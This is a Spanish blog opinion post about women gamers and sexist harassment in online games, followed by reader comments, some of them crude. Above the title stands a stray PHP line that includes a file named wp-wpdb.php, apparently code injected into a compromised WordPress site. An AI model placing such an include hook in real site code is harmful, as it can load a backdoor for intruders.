if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Chicas gamers, siempre hemos estado ahí – La Fortaleza de LeChuck

Chicas gamers, siempre hemos estado ahí

El mercado de los videojuegos siempre ha sido un sector donde los consumidores principales han sido los hombres, pero con la incorporación de los juegos sociales otro tipo de jugadores han descubierto el maravilloso mundo de los videojuegos, entre ellos las mujeres. Muchas han dado el salto a consolas y a juegos hardcore. Pero hay chicas que desde siempre han estado ahí, viciándose desde tiempos inmemoriales, cuando las primeras consolas y ordenadores poblaban los hogares españoles. Esas chicas también han disfrutado de los primeros MMORPG y FPS, géneros que se creían prácticamente exclusivos del público masculino.

Las referencias sexuales o machistas son continuas en géneros como los shooters, donde algunos individuos aprovechan el anonimato para balbucear todo tipo de improperios. Por motivo de este tipo de comportamiento masculino, unas gamers reales de habla inglesa han creado un video para denunciar e ironizar sobre la actitud de ese grupo de personajes que rabian cuando una tia les vence, o por el simple hecho de tener que jugar con mujeres.

Como podéis ver hay chicas gamers de todo tipo, razas y edades, que juegan a muchos géneros diferentes. Espero que llegue un día que la gente se deje de tonterías, madure y comprenda que el objetivo de los videojuegos es divertirse sin importar que juegues contra chic@s, abuel@s, padres, madres, monos de 3 cabezas, y demás. Por supuesto, entre tanto anormal también hay chicos majos, que no quieren ni ligar, ni saber tu edad, ni de donde eres, ni tu msn, solo jugar.

El crecimiento de la mujer en los videojuegos está muy cerca de igualar al del hombre en nuestro país, e incluso existen chicas españolas que compiten como jugadoras profesionales. Algo bastante corriente en otros paises, donde nadie se sorprende en encontrar mujeres ganando campeonatos o dando una real paliza en cualquier juego.

Ahora es tan fácil encontrar a una chica en un FPS como que tu padre te agregue al facebook.
Para terminar, recordad: Women also kill! 🙂

Publicada el
Categorizado como Opinión

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

15 comentarios

  1. Pues yo conozco muchas chicas q son gamers con las que juego de forma habitual, y no tienen necesidad de hacer ningún video para reivindicarse… Está claro que trolls y subnormales siempre habrá, pero el hecho de que una chica juegue a videojuegos de manera hardcore no es algo fuera de lo común, desde hace ya tiempo.

  2. Está claro que necesario no es, igual que no lo son muchos videos que corren por youtube, pero me parece una buena forma de recoger la cantidad de subnormalidades que se pueden escuchar al jugar online, nada comparable con las que puede recibir un tio, te lo aseguro.
    Por otro lado, muchos o no se dan cuenta que hay muchas mujeres jugando a juegos hardcore o no les gusta que pisen su

  3. jajaja bueno ya no es cosa de tios ni de tias, sino que hay gente que no les gusta los juegos de tiros o de lucha. Prueba enseñándole una aventura gráfica, algún juego divertido de Wii como New super mario, wii party y cosas así 🙂

  4. Pues mi padre probó Portal y no pasó la primera fase XD No sabe usar el ratón y a la vez usar WASD
    Respecto al artículo, no conozco a ninguna chica gamer, sólo a una que juega juegos de rol porque es mu fantasiosa. Aunque vamos, me parece absurdo que alguien pueda quejarse de que le ha ganado una mujer. A mí me ganan en Mario Kart y sé que es o por suerte que le ha tocado buenos objetos o

  5. Una cosa: me he apostado 40 euros con mi hermano a que podía encontrar a un chica gamer que estuviera buena y subiera vídeos a youtube (después de enseñarle unos vídeos me dijo que no contaba por que eran argentinas y mexicanas y allí están todas buenas) una ayudita

Dejar un comentario